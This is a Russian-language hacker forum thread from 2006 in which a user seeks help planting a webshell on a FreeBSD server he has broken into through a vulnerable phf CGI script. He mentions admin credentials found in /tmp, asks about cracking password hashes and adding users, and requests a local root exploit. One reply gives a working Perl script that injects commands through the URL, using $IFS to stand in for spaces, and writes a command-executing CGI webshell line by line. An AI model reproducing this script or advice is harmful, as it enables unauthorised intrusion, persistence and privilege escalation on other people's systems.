Нужно загрузить на сервак вэбшелл
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Нужно загрузить на сервак вэбшелл - 2006-12-02 01:28:04.140000
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
Есть машина FreeBSD 4.11 Есть доступ через бажный скрипт во все директории (почти). Но записать можно только в две. Хочу залить вэбшелл на такую тачку. Ни одно качалка не пашет [:(] Помогите, пожалуйста
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-02 01:42:06.890000
|
|
|
rtw
Сообщений: 1372
Оценки: 0
Присоединился: 2004-08-19 00:28:05
|
ну тогда вопрос: а что там вообще пашет?
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-02 13:04:09.060000
|
|
|
crypter
Сообщений: 23
Оценки: 0
Присоединился: 2006-11-27 10:12:13.980000
|
может тебя твой бажный скрипт не дал полномочий для записи ??? ну а если даже дал то в те директории куда админ не ставил огроничения по записи . если ошибаюсь извените.
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-02 13:30:09.140000
|
|
|
KPOT_f!nd
Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
|
curl GET wget lynx - юзал! А ты просто скопировай в буфер обмена и потом на шелле вставь! Если ты юзаешь putty! :@ZLOY
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-02 14:46:58.360000
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
Доступ у меня только через дырку в скрипте, без Putty, Причем даже echo с перенапрвлением вывода не пишет даже в 777 директории, > похоже не обрабатывается. При чем, я знаю логин и пасс админа(нашел в tmp), но не могу найти саму админку :D И кстати, каким алгоритмом шифрует htpasswd, потому как те пассы которые удалось достать еще, точно не MD5 захешированы. Что то вроде этого MQTLCJO0SwVIs
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-02 23:10:09.483333
|
|
|
kavardo
Сообщений: 9
Оценки: 0
Присоединился: 2006-12-02 16:48:55.250000
|
#!/usr/bin/perl use LWP::Simple; $host = 'http://'; $host .= $ARGV[0]; $URL="$host|perl\$IFS-e\$IFS\"print\$IFS''.chr(35)\">/path|"; get($URL); $URL="$host|echo\$IFS'!/usr/bin/perl'>>//path|"; get($URL); $URL="$host|echo\$IFS'use'\$IFS'CGI'\$IFS'qw(:standard);'>>/path|"; get($URL); $URL="$host|echo\$IFS'print'\$IFS'header();'>>/path|"; get($URL); $URL="$host|echo\$IFS'print'\$IFS'start_html();'>>/path|"; get($URL); $URL="$host|echo\$IFS'\$inpt=param(\"cmd\");'>>/path|"; get($URL); $URL="$host|echo\$IFS'\$cmdout=`\$inpt`;'>>/path|"; get($URL); $URL="$host|echo\$IFS'print'\$IFS'ul(\"\$cmdout\");'>>/path|"; get($URL); $URL="$host|echo\$IFS'print'\$IFS'end_html();'>>/path|"; get($URL);
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-03 00:14:58.593333
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
Большое спасибо, но вот как эту радость залить на сам сервак?;) echo не предлагать:D
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-03 00:18:40.780000
|
|
|
KPOT_f!nd
Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
|
quote:
Доступ у меня только через дырку в скрипте Да пустим не допустим! ты короче! Объясни как ты юзаешь багу ! Уже сть ssh? :@ZLOY
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-03 01:44:43.216666
|
|
|
IN$1DE
Сообщений: 58
Оценки: 0
Присоединился: 2006-12-03 01:27:00.546666
|
Проверь which fetch; which wget; и тд…
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-03 02:01:13.936666
|
|
|
KPOT_f!nd
Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
|
quote:
Проверь which fetch; which wget; и тд… Читай посты выше от меня! :@ZLOY
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-03 03:23:20.310000
|
|
|
IN$1DE
Сообщений: 58
Оценки: 0
Присоединился: 2006-12-03 01:27:00.546666
|
и чё? читал не слепой, во первый ты fetch не указал, во вторых я команду для проверки напечатал…
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-03 18:40:34.173333
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
Скрипт такого типа: www.somehost.com/cgi-bin/phf?Qname=root%0A команда Ssh доступа пока нету, не знаю как добавить нового юзера. Как передать команде useradd сразу все параметры, а еще интиресние как заюзать passwd для созданого юзера. Кто знает?
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-04 22:10:54.780000
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
Ни одна из вышеперечисленых прог не работает (хотя все они установлены:)). Но, я нашел рабочий (я так думаю, потому, что он хоть что-то выдает:)) tftp. Но вот незадача, я никогда им не пользовался и не могу составить правильно запрос, помогите пожалуйста!
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-13 20:32:11.250000
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
Шелл я залил, но вот незадача - непашет (ошибка 404). Думал с правами что-то не то, выставил 777 - толку ноль. Возможно, что бы все пхп скрипты должны пренадлежать одному юзеру и только тогда запускались?
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-13 20:40:17.673333
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
Подскажите, пожалуйста, хороший сплойт для фряхи 4.11, можно локальный
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-15 20:54:09.293333
|
|
|
IN$1DE
Сообщений: 58
Оценки: 0
Присоединился: 2006-12-03 01:27:00.546666
|
В паблик такого пока нет (не видел)
|
|
|
RE: Нужно загрузить на сервак вэбшелл - 2006-12-16 20:03:31.216666
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
Я нашел пару, но им нужен полноценный шел) Proof Of Concept exploit for the Freebsd file descriptors bug - типо такого.
|
|
|
|
|